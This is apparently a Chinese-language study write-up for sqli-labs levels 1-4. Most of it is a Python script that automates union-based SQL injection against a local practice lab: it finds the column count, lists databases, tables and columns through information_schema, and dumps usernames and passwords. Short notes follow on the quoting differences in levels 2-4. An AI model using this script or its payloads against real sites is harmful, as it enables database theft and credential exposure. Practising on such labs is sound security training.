sqli-labs:1-4,基于报错的注入
sqli1:
脚本
1 # -*- coding: utf-8 -*- 2 """ 3 Created on Sat Mar 23 09:37:14 2019 4 5 @author: kenshin 6 """ 7 8 import requests,re 9 url = 'http://localhost/sqli-labs/Less-1/?id=-1' 10 11 def Len_OrderBy(url): 12 pattern_mark = 'Unknown column' 13 #假设字段长20 14 for i in range(1,20): 15 url_new = url + "\' order by "+ str(i) +"--+" 16 r = requests.get(url_new) 17 if(re.findall(pattern_mark,r.text)): 18 print('the lenght of column(order by) is :' + str(i-1) + "\n") 19 break 20 return i-1 21 22 def get_DB(url,lenght): 23 #注意:由此模式匹配到的是一个数量为1的列表,后续按','将数量拆分成n个,以便输出 24 pattern_mark = 'Your Login name:(.+?)<br>' 25 str = '' 26 for i in range(1,lenght): 27 str += 'group_concat(schema_name),' 28 str += 'group_concat(schema_name)' 29 payload = '\' union select ' + str +' from information_schema.schemata--+' 30 url += payload 31 r = requests.get(url) 32 r = re.findall(pattern_mark,r.text) 33 #list转str 34 str_tmp = "".join(r) 35 #re.split按','拆分 36 lst = re.split(',',str_tmp) 37 print('-'*9 + 'databases' + '-'*8) 38 for s in lst: 39 print('.' + s ) 40 print('-'*25) 41 42 def get_TB(url,lenght,db): 43 pattern_mark = 'Your Login name:(.+?)<br>' 44 str = '' 45 for i in range(1,lenght): 46 str += 'group_concat(table_name),' 47 str += 'group_concat(table_name)' 48 payload = "\' union select "+ str +" from information_schema.tables where table_schema=\'" + db + "\'--+" 49 url += payload 50 r = requests.get(url) 51 r = re.findall(pattern_mark,r.text) 52 #list转str 53 str_tmp = "".join(r) 54 #re.split按','拆分 55 lst = re.split(',',str_tmp) 56 print('-'*9 +'Database '+ db +'\'s Tables' + '-'*8) 57 for s in lst: 58 print('.' + s ) 59 print('-'*35) 60 61 def get_Column(url,lenght,tb): 62 pattern_mark = 'Your Login name:(.+?)<br>' 63 str = '' 64 for i in range(1,lenght): 65 str += 'group_concat(column_name),' 66 str += 'group_concat(column_name)' 67 payload = "\' union select " +str+ " from information_schema.columns where table_name=\'" +tb+ "\'--+" 68 url += payload 69 r = requests.get(url) 70 r = re.findall(pattern_mark,r.text) 71 #list转str 72 str_tmp = ''.join(r) 73 #re.split按','拆分 74 lst = re.split(',',str_tmp) 75 print('-'*9 +'Table '+ tb +'\'s Columns' + '-'*8) 76 for s in lst: 77 print('.' + s ) 78 print('-'*35) 79 80 def get_data(url,lenght,tb,data): 81 pattern_mark = 'Your Login name:(.+?)<br>' 82 pattern_mark_pass = 'Your Password:(.+?)</font>' 83 #if lenght=5 84 #data=a,b,c 85 #after expend 86 #data=a,b,c,4,5 87 #str to list 88 lst = data.split(",") 89 while len(lst) < lenght: 90 lst.append(str(len(lst)+1)) 91 #list to str 92 sn = '' 93 for i in lst: 94 sn += i+"," 95 #以上循环结果sn='a,b,c,' c后的‘,’舍去才能构造正确payload 96 sn=sn.rstrip(",") 97 #格式化输出结果 98 print('-'*9 +'Table '+ tb +'\'s All datas' + '-'*8) 99 #假设最多有100组数据 100 for i in range(1,100): 101 payload = "\' union select "+ sn +" from "+ tb +" where id="+ str(i) +"--+" 102 url_new = url + payload 103 r = r_pass = requests.get(url_new) 104 r = re.findall(pattern_mark,r.text) 105 r_pass = re.findall(pattern_mark_pass,r_pass.text) 106 print(str(r) +" "*(16-len(str(r)))+"=> "+str(r_pass)+" "*(18-len(str(r_pass)))+"|") 107 if (len(r)==0 and len(r_pass)==0): 108 break 109 print("-"*41) 110 111 #字段长度 112 lenght = Len_OrderBy(url) 113 #所有数据库 114 get_DB(url,lenght) 115 #由库爆表 116 db = input("select databases >> ") 117 get_TB(url,lenght,db) 118 #由表爆列 119 tb = input("select table >> ") 120 get_Column(url,3,tb) 121 #由表和列名爆数据 122 data = input("select columns (no more than " +str(lenght)+ ",and separate by ',') >> ") 123 get_data(url,lenght,tb,data)
sqli2:
与sqli1比较,少了 ',对id没有经过处理。
sqli3:
对id经过了')处理
sqli4:
对id经过了")处理